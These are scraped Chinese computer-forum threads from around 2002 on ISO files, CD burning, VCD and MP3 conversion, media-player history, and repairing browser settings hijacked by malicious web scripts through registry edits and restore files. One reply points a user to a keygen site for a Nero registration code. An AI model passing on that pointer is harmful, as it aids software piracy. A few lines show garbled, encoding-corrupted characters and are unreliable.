请问怎么打开.iso文件，急！

计算机技术
请问怎么打开.iso文件，急！

上一贴 | 下一贴
发表人 | 主题: 请问怎么打开.iso文件，急！
丁子 初级用户 积分：4 发帖：2 来自： 注册：2001-11-28 | 发表于 2002-01-04 10:22:26 按此观看丁子的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给丁子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看丁子的IP 下载了一个程序，可是是.iso后缀名的，请问该如何打开，谢了，急！ 如果能够买一些回忆， 我只要那一天； 如果能够买一些梦想， 我只要那个人。 如果城市突然停顿下来， 留一点酒给我； 如果爱情突然悬浮而去， 留一点黑暗给我。
巍笑 Vshine 积分：1621 发帖：992 来自：江西南昌 注册：2001-11-16 | 发表于 2002-01-04 10:30:54 按此观看巍笑的个人资料 按此发邮件给巍笑 访问巍笑的主页 巍笑 的 oicq 是419098,查看 419098 的资料 发送悄悄话给巍笑 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看巍笑的IP 下载winiso WinISO 5.3 简体中文汉化注册版 软件大小：1.61M 软件类型：国外软件 / 共享软件 / 光盘工具 运行环境：Win9x/Me/NT/2000/XP 界面预览：无 加入时间：2001-11-24 本日下载：6 本周：124 总计：24698 推荐等级： 软件来源：http://www.soft163.com 软件介绍： 很多人希望编辑iso文件，vcdromx虽然也可以，但是太麻烦了，winiso就是这样一个功能强大的磁盘镜像编辑工具,支持iso、bin等格式，支持格式互转，可以进行添加、删除文件、目录等操作。 Necromancer of Might and Magic
丁子 初级用户 积分：4 发帖：2 来自： 注册：2001-11-28 | 发表于 2002-01-04 10:43:43 按此观看丁子的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给丁子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看丁子的IP 楼上的，谢谢了，：） 如果能够买一些回忆， 我只要那一天； 如果能够买一些梦想， 我只要那个人。 如果城市突然停顿下来， 留一点酒给我； 如果爱情突然悬浮而去， 留一点黑暗给我。
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2002-01-04 13:25:45 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent winimage
lingxt 初级用户 积分：0 发帖：2 来自：陕西 注册：2001-12-07 | 发表于 2002-01-05 09:45:50 按此观看lingxt的个人资料 按此发邮件给lingxt lingxt 的 oicq 是7315603,查看 7315603 的资料 发送悄悄话给lingxt 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lingxt的IP 下载ISOBLUSTER也可以。 总之这方面的软件很多的。 在未来能笑的人才是强者。
lingxt 初级用户 积分：0 发帖：2 来自：陕西 注册：2001-12-07 | 发表于 2002-01-05 09:46:01 按此观看lingxt的个人资料 按此发邮件给lingxt lingxt 的 oicq 是7315603,查看 7315603 的资料 发送悄悄话给lingxt 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lingxt的IP 下载ISOBLUSTER也可以。 总之这方面的软件很多的。 在未来能笑的人才是强者。
上一贴 | 下一贴
快速回复 | 主题：请问怎么打开.iso文件，急！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


哪种刻录软件好用？

计算机技术
哪种刻录软件好用？

上一贴 | 下一贴
发表人 | 主题: 哪种刻录软件好用？
Ro 初级用户 积分：44 发帖：14 来自： 注册：2001-11-27 | 发表于 2001-12-26 00:04:39 按此观看Ro的个人资料 按此发邮件给Ro 收藏该主题供以后查看 发送悄悄话给Ro 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Ro的IP 哪种刻录软件好用？ 有没有带注册码的刻录软件下载？
POPOEVER N个蓝色大泡泡 版主 积分：19175 发帖：5030 来自：Keyframe G.L 注册：2000-07-17 | 发表于 2001-12-26 00:07:08 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP 我用Nero burning和DirectCD XTree 无可救药地活着，睡眼朦胧地醒着 Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
雪饮狂刀1 初级用户 积分：20 发帖：7 来自： 注册：2001-12-11 | 发表于 2001-12-26 09:41:25 按此观看雪饮狂刀1的个人资料 按此发邮件给雪饮狂刀1 发送悄悄话给雪饮狂刀1 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看雪饮狂刀1的IP 做启动盘我用nero 做一般的数据盘就用WinXP自带的刻录功能 人在网上飘，有谁不挨刀!
Ro 初级用户 积分：44 发帖：14 来自： 注册：2001-11-27 | 发表于 2001-12-26 14:41:51 按此观看Ro的个人资料 按此发邮件给Ro 发送悄悄话给Ro 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Ro的IP 谢谢，你们能告诉我nero的版本号和注册码吗？ 发我信箱里也可以，acer5@371.net
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2001-12-26 17:38:36 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent Nero 5.5.6.4 注册器到这里搜索 http://astalavista.box.sk/
Ro 初级用户 积分：44 发帖：14 来自： 注册：2001-11-27 | 发表于 2001-12-26 18:20:59 按此观看Ro的个人资料 按此发邮件给Ro 发送悄悄话给Ro 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Ro的IP 谢谢
上一贴 | 下一贴
快速回复 | 主题：哪种刻录软件好用？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


寻找可以制作VCD、电脑两用光盘的软件？

计算机技术
寻找可以制作VCD、电脑两用光盘的软件？

上一贴 | 下一贴
发表人 主题: 寻找可以制作VCD、电脑两用光盘的软件？
bjSun

初级用户
积分：69
发帖：31
来自：中国北京
注册：2001-09-14
 发表于 2001-12-30 11:10:51 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 收藏该主题供以后查看 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
寻找可以制作VCD、电脑两用光盘的软件？

Sun
大哥

超级用户
积分：318
发帖：111
来自：
注册：2001-12-20
 发表于 2001-12-30 13:19:14 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
不明白你的意思。电脑光驱本身兼容VCD、CD－ROM、CD等，不就已经是多用的了吗？

Easy CD Creator 5.0 可以满足要求。

老哥我知道的就这么多了。
bjSun

初级用户
积分：69
发帖：31
来自：中国北京
注册：2001-09-14
 发表于 2002-01-04 09:35:45 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
大哥在上个帖子中说
引用:
不明白你的意思。电脑光驱本身兼容VCD、CD－ROM、CD等，不就已经是多用的了吗？

Easy CD Creator 5.0 可以满足要求。

我的意思是：要在电脑上做好AVI，然后刻录到光盘上，刻录好以后，放到电脑光驱、VCD机、DVD机等都可以播放。可以怎么做？

Sun
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-04 13:27:55 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
要变为VCD格式，不能用avi格式
bjSun

初级用户
积分：69
发帖：31
来自：中国北京
注册：2001-09-14
 发表于 2002-01-07 09:11:02 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
Bee007在上个帖子中说
引用:
要变为VCD格式，不能用avi格式

要在刻录的时候转换？我不知道制作的时候什么软件可以把AVI的转换保存为VCD格式的。

Sun
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-07 15:43:12 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
给你一些相关网址：

http://www.yufeng21.com/veditor/vcd/
http://www.chip-china.com/product/software/softwaretest/Rwcdlist.htm

上一贴 | 下一贴
快速回复 | 主题：寻找可以制作VCD、电脑两用光盘的软件？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可

计算机技术
请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可

上一贴 | 下一贴
发表人 | 主题: 请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可
soandy 初级用户 积分：54 发帖：18 来自：广东省 注册：2001-12-21 | 发表于 2001-12-22 02:48:48 按此观看soandy的个人资料 按此发邮件给soandy 访问soandy的主页 soandy 的 oicq 是3709178,查看 3709178 的资料 收藏该主题供以后查看 发送悄悄话给soandy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看soandy的IP 请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可以压到吗？ soandy
freedog 初级用户 积分：0 发帖：21 来自： 注册：2001-12-14 | 发表于 2001-12-22 03:48:35 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP 可以！ I am a freedog！
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2001-12-22 14:59:49 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 还是来些专业软件吧： Exact Audio Copy + Lame
gate 初级用户 积分：22 发帖：25 来自：浙江 注册：2001-10-30 | 发表于 2001-12-26 15:49:17 按此观看gate的个人资料 按此发邮件给gate 发送悄悄话给gate 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gate的IP AudioCatalyst 享受每一天！
胸口别朵大红花 乱 步 管理员 积分：3982 发帖：2141 来自：TOPIDEA.ORG 注册：2000-09-19 | 发表于 2001-12-26 17:21:32 按此观看胸口别朵大红花的个人资料 按此发邮件给胸口别朵大红花 访问胸口别朵大红花的主页 胸口别朵大红花 的 oicq 是2148860,查看 2148860 的资料 发送悄悄话给胸口别朵大红花 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看胸口别朵大红花的IP 超级解霸里使用音频解霸播放VCD，录音即可 Blueidea Web Team Team Housekeeper
上一贴 | 下一贴
快速回复 | 主题：请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


realplayer播放器的插件存在什么地方了？

计算机技术
realplayer播放器的插件存在什么地方了？

上一贴 | 下一贴
发表人 | 主题: realplayer播放器的插件存在什么地方了？
birder 终级用户 积分：611 发帖：243 来自： 注册：2001-06-19 | 发表于 2002-01-15 09:42:23 按此观看birder的个人资料 按此发邮件给birder birder 的 oicq 是68656054,查看 68656054 的资料 收藏该主题供以后查看 发送悄悄话给birder 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birder的IP 安装了realplayer播放电影，有时提示需要某种插件支持， 如果可以上网的话可以直接下载下载，自动安装。 但对于局域网的用户来说就不行了， 不知道这些插件存在哪个文件夹下面了， 如果可以找到，是不是把插件直接拷到另一台机子上,这样别人也可以实现插件升级了？ 在荆棘中放歌~~
令狐瓜子 9sun 管理员 积分：5449 发帖：1492 来自：南京 注册：2000-07-07 | 发表于 2002-01-15 09:58:52 按此观看令狐瓜子的个人资料 按此发邮件给令狐瓜子 令狐瓜子 的 oicq 是15998803,查看 15998803 的资料 发送悄悄话给令狐瓜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看令狐瓜子的IP c:\Program Files\COMMON Files\REAL\Plugins 独孤八剑 Blueidea Web Team. Moderator Of Flash Forum
上一贴 | 下一贴
快速回复 | 主题：realplayer播放器的插件存在什么地方了？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问请问

计算机技术
请问请问

上一贴 | 下一贴
发表人 | 主题: 请问请问
新新手 超级用户 积分：367 发帖：105 来自： 注册：2000-12-28 | 发表于 2002-01-11 16:23:16 按此观看新新手的个人资料 按此发邮件给新新手 收藏该主题供以后查看 发送悄悄话给新新手 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看新新手的IP 请问如何清除媒体播放器7。0和REALPLAY 的历史记录？ 谢谢！
新新手 超级用户 积分：367 发帖：105 来自： 注册：2000-12-28 | 发表于 2002-01-14 08:42:34 按此观看新新手的个人资料 按此发邮件给新新手 发送悄悄话给新新手 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看新新手的IP 太简单了？
2smile 活着就好 积分：1622 发帖：1907 来自：SD 注册：2001-05-13 | 发表于 2002-01-14 09:49:03 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP realplayer regedit// HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips1 .............\MostRecentClips2 .............\MostRecentClips3 .............\MostRecentClips4 .............\MostRecentClips5 .............\MostRecentClips6 ........... del之 wmp 7.0 HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList 下面存放最近播放列表, del 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
上一贴 | 下一贴
快速回复 | 主题：请问请问
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


IE相关反修改集粹

计算机技术
IE相关反修改集粹

上一贴 | 下一贴
发表人 主题: IE相关反修改集粹
AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-19 12:04:45 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 收藏该主题供以后查看 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
总有朋友说自己的IE出了问题，不外乎是IE被恶意修改了，这里有很多防范和反修改的技巧，和大家共享！呵呵，上帝保佑！

最近一些网页为了达到宣传的目的，利用IE的漏洞修改浏览者的注册表，肆意修改IE的首页、标题栏等内容，令人憎恶。本文按直接修改注册表和用MagicSet修改两个方法说明如何去除这些内容及防范。如果你对注册表比较熟悉，可参考本文所述的键值直接对其修改，如果对注册表不熟的话建议使用MagicSet即超级兔子魔法设置软件来改，安全且方便，本文以3.92版为例。

一、修改IE的标题栏

即在IE浏览器最上方的蓝色横条里做广告，而不是显示默认的“Microsoft Internet Explorer”。这种修改非常常见，有人也特意针对它编制了反修改的程序。

1.注册表法

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main
HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main在注册表中找到以上两处主键，将其下的“Window Title”主键删除，并关闭所有打开的IE浏览器窗口再重新打开就能看到效果。

2.MagicSet法

点击“IE 4/5”，点击与“IE 标题”字体平行的“复原”按钮即可。

二、修改IE的首页

这个改回来很方便，在IE的设置里就有。比较麻烦的是某些网页在浏览者的硬盘里写入程序，使重启计算机后首页设置又被改了回去，这时可使用“系统配置实用程序”来解决。开始—运行，键入msconfig点击“确定”，在弹出的窗口中切换到“启动”选项卡，禁用可疑程序启动项。

三、在Windows启动时显示一个窗口，点确定才能进去

这个设置其实与IE无关，而是Windows的登录提示窗口，不过最近有些网页对它动上了脑筋，在这个窗口里做广告。

1.注册表法

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon在注册表中找到此主键，将其下的“LegalNoticeCaption”和“LegalNoticeText”主键删除即可。

2.MagicSet法

点击“安全与多用户”，再点击左上角的“+”切换窗口后，清除“启动时要显示的标题”和“启动时要显示的信息”两项内容即可。

四、在IE里点击鼠标右键。在弹出的菜单里显示网页广告

这种情况很少见，我还没碰到过，不过解决方法也不复杂。

1.注册表法

HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt在IE中显示的附加右键菜单都在这里设置，常见的网络蚂蚁和网际快车点击右键下载的信息也存放在这里，只需找到显示广告的主键条目删除即可。

2.MagicSet法

点击“IE 4/5”，再点击左上角的“+”切换窗口后，在上方的列表窗口中即可修改、删除IE的附加右键菜单项。

五、防范

1.因为修改注册表设置都是用的JavaScript脚本语言，所以只需禁用它即可。但这种脚本语言应用广泛，所以建议在IE的设置中将脚本设为“提示”。

2.建议使用一些单窗口多页面的浏览器如NetCaptor等，因为它们往往能更方便地切换脚本设置，象我常用的NetCaptor，用工具栏中的“安全”按钮能很方便地设置脚本、ActiveX和Cookie的启用情况。

3.使用IE6.0，虽然迟迟看不到这个浏览器的正式版本，而且测试版问题很多，但据用过的人说使用它浏览网页，将无法再随意修改你的注册表。

4.使用Win2000的朋友，只需在“控制面板”—“管理工具”—“服务”中禁用Remote Registry Service服务，也无法通过浏览网页来修改你的注册表了。

5.使用Norton AntiVirus 2002 v8.0杀毒软件，这个版本新增Script Blocking功能，将通过IE修改注册表的代码定义为Trojan.Offensive并予以拦截。

六、相关软件

1.MagicSet V3.92
http://www.superrsoft.com/

2.IE浏览器标题栏修改器（IETitleFixer） V1.3
http://www.soft999.com/download1/IETitleFixer13.zip
可修改IE的标题栏、主页及OE的标题栏，只是需要VB6运行库的支持。

3.IE反修改精灵 V1.52
http://www.soft999.com/download1/IESetup.exe
除了可修改IE的标题栏，还可设置为开机自动运行并使桌面图标透明。

七、快速恢复

将以下内容复制粘贴到记事本，并存为UnDoIE.reg文件，注意在保存时选“保存类型”为所有文件，这样它在保存时就不会自动加上.txt的后缀名了。

REGEDIT4

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main]
\"Window Title\"=\"Microsoft Internet Explorer\"
\"Start Page\"=\"about:blank\"

[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]
\"Window Title\"=\"Microsoft Internet Explorer\"

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon]
\"LegalNoticeCaption\"=\"\"
\"LegalNoticeText\"=\"\"

在发现上述IE相关设置被网页修改后，双击UnDoIE.reg即可将上述一、二及三项同时复原了。

打雷了！下雨了！大家快回家收衣服啊……
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-01-21 11:12:54 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
很多人都问过这样的问题，置顶几天，相信对大家能有所帮助

Blueidea Web Team.
Moderator Of Computer Technology Forum
blueonline

Blueonline
积分：815
发帖：1676
来自：blue-online.
注册：2000-12-09
 发表于 2002-01-22 13:20:58 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP
来补充一点

三、手动清除

1. 注册表被禁用

对注册表的编辑是解决本文所涉及问题的关键所在，而许多朋友在打开注册表修编辑器时，却发现居然连注册表都被"管理员禁用"了！其实这也是含有恶意代码的网页文件捣的鬼。如果您的注册表也被禁用了，可以按下面的方法来解锁：

1.)新建一个文本文件，输入以下内容（注意保持文本格式）：
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000
点击"文件"菜单，选择"保存"命令，以"recover.reg"为文件名保存在任意位置。
2.)双击该"recover.reg"文件，系统弹出"是否确认要将 recover.reg 中的信息添加进注册表"的确认框，点?quot;是"，随后，系统提示"recover.reg 里的信息已被成功地输入注册表"，再点击"确定"即可将注册表解锁并进行随后的修改。

2. 开始菜单的"运行"消失

在"运行"栏中输入regedit是我们常用的打开注册表编辑器的方式。然而有些含恶意代码的网页甚至连这里都不放过，难道它们认为凭这就可以阻止我们对注册表的反修改吗？没问题，用两个简单的方法就可以把"运行"恢复。
其一，进入C:\WINNT（Win9X的用户为C:\WINDOWS），找到"regedit.exe"，双击它就可以打开注册表编辑器，接着请定位到：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
找到"NoRun"值项，右键单击之，选择"修改"（或者直接删除更好），把它的值改为 0，重新启动电脑即可；
其二，新建一个文本文件，输入以下内容ㄗ⒁獗３治谋靖袷剑?br> REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoRun"=dword:00000000
将该文件保存为run.reg文件，双击该文件，重启电脑后，再打开"开始"菜单看看，"运行"选项是不是已经恢复了呢？

3. IE浏览器的标题栏被修改

这是目前最常见的修改IE浏览器的方式。它的反修改也很容易，首先打开"开始"菜单，选?quot;运行...... "命令，在弹出的输入框中输入"regedit"，点击"确定"即打开了注册表编辑器。然后请定位到：
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main 、
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 及HKEY_USERS\.DEFAULT\Control Panel
三处子项，您会发现在它们下面都有一个叫"Window Title"的值项（也可能只有一处有，关键是要修改HKCU的值项），用鼠标右键单击该值项，在弹出菜单选择"修改"，将它修改为默认的"Microsoft Internet Explorer"或者任意您希望看到的语句，最后关闭注册表编辑器并打开一个新的IE浏览器窗口，就能看到您设定的效果。

4. OutLook的标题栏被修改

这个情况比较少见，至少我没有遇到过，只怯型研葱爬囱剩也胖烙行┤司尤晃蘖牡秸庵值夭健２还还叵担姆葱薷耐芗虻ィ蚩⒉岜肀嗉鳎ㄎ坏剑?br> HKEY_CURRENT_USER\Software\Microsoft\Outlook Express
子项下，找到值项"Window Title"，和反修改IE浏览器的方法一样来修改"Window Title"值。最后关闭注册表编辑器并重起OutLook即可看到效果。

5. IE浏览器的首页被修改

这可能是目前网友反映最多的一个问题。一开始的时候解决这个问题很简单，在IE的菜单中选择："工具"-->"Internet选项"-->"常规" ，在"主页"一栏中进行修改即可。但随着事态的发展，形势日趋严峻：一些网站的站长将多个脚本程序联合使用，导致的后果往往就是首页被修改的同时，IE的"主页"选项也被禁用（按钮呈灰色不可用状态）！不过，没问题，现在我们就来解决这个问题。
请您打开注册表编辑器。定位到：HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel及HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
两处子项，你会发现一个名为HomePage的DWORD值项，值为: 1 ，不必犹豫，直接删掉它，或者把值改为0。然后关闭注册表编辑器，新开一个IE浏览器，再依次点击"工具"-->"Internet选项"-->"常规"，你就会发现原来呈灰色的修改IE主页的按钮已经恢复到了可编辑状态。此时您就可以按自己的喜好随意设定浏览器的主页了。

6. IE浏览器的默认页及空白页被修改

打开注册表编辑器，定位到：HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main子项，修改Default_Page_URL的值即可（原IE的默认页为http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome）。
定位到：HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main子项，修改Local Page的值即可。

7. 每次开机后弹出一个网页

如果您每次开机后都会弹出一个IE浏览器，那就请您记住地址栏里的网址，然后打开注册表编辑器，定位到：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
看看在该子项下是否有一个以这个网址为值的值项，如果有，删除它。下次开机时就不会再有浏览器弹出了。不过道高一尺，魔高一丈，有时候这样也未必能解决问题。遇到这种情况，您可以在注册表编辑器的菜单里选?quot;编辑"-->"查找……."，在"查找"对话框内输入开机时自动打开的网址，然后点击"查找下一个"，将查找到的值项删除。另外，如果您是使用Win98的用户，请在"开始"菜单中的"运行"对话框内输入"msconfig"，点击确定，打开"系统配置实用程序"并点击"启动"选项卡，检查其中是否有可疑的启动项，有点话请将其禁用（去掉程序前的勾），然后重起系统查看效果。如果您是Win2000的用户，可以copyWin98或WinXP下的"系统配置实用程序"（可以在我的主页http://www.blue-online.net/ 下载。）来查找。

8. 每次开机后弹出一个确定框

这是Windows登陆后的一个提示框，Win98的用户可以在组策略中自由定义提示框的内容。也可在注册表里编辑它。打开注册表编辑器，定位到：
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
该主键下分别有"LegalNoticeCaption"和"LegalNoticeText"两个值项。他们分别定义了该提示框的标题和正文内容。将这两个值项删除即可。

9. IE浏览器的鼠标右键被禁用

其症状即为打开任意一个网页，单击鼠标右键都无法弹出菜单选项。这给许多经常上网的朋友造成了很多不便。和上面一样，打开注册表编辑器，定位到：HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,在该子项下有一个dword值为1的"NoBrowserContextMenu"值项，删掉它即可。

10. 右键菜单内被添加网站链接

很多朋友会在无意间突然发现，自己的右键菜单里不知道什么时候多出了一个"欢迎光临XXXXXX网站"的选项，点击之后便会打开浏览器进入这个网站。其实这往往是通过脚本程序在注册表里做了手脚。我最早遇到这种情况是在5、6年前，那时3721网站就采用了这种技术，在访问者的右键菜单加上了他们网站的快捷方式。解决的方法也很简单，定位到：HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt ,仔细查看其下的子项，删除你不要的即可。当然您也可以照此格式添加自己的快捷方式，比如常去的网站等等。不过要是您对注册表不太熟悉的话，建议您先做好备份再修改。

11. 桌面上的图标全部消失

如果当您打开电脑，发现自己的桌面上居然空空如也，一个图标都不见了，您会作何感想？不用说，这十有八九又是"上网惹得祸"。如果您想恢复，请把注册表定位到：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，
找到"NoDesktop"值项，右键单击之，选择"修改"（或者干脆删除也可以），把它的值改为0，重新启动电脑即可。看看，是不是又恢复到您熟悉的桌面了^_^？

12. IE工具栏（菜单）被添加网站链接

大家都知道，我们常用的软件如Flashget、ICQ等在安装后，会向IE的工具栏（菜单）中添加它们的快捷方式。现在有些网站也通过恶意脚本修改注册表来达到同样的效果。下面就让我们来解决这个问题，请把注册表定位到：
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions，您会看到在该主键下有一些形同"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"的子键，仔细查看一下您就会明白，这些子键就是解决问题的关键所在，现在您只需将包含恶意网站链接的那个子键删除即可。另外，如果在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\CmdMapping下有和您删除的形同{X......X}一样键值的值项，也请将它删除。完成后关闭注册表编辑器，重新打开一个IE窗口，看看工具栏（菜单）是不是已经恢复了？其实利用这个特性我们还可以DIY一个属于自己的个性工具栏，具体的做法您可以在我的网站的注册表进阶栏目中找到。

流自己的汗，吃自己的饭，靠天、靠地不如自己干。

:::::::bLUE-oNlINE.nET || vERSION 2001 ───────

幽灵

超级用户
积分：358
发帖：216
来自：上海
注册：2001-02-25
 发表于 2002-01-22 15:54:01 按此观看幽灵的个人资料 按此发邮件给幽灵 幽灵 的 oicq 是15868256,查看 15868256 的资料 发送悄悄话给幽灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看幽灵的IP
我以前一直遇到这种问题，现在升级到了IE6.0，有时也用MSN浏览器，外加一个NORTON防火墙，至今没有遇到过（好像在做广告似的）

上帝会保佑我的，一切都会有的！
啸

无意
现任版主
积分：5736
发帖：1962
来自：
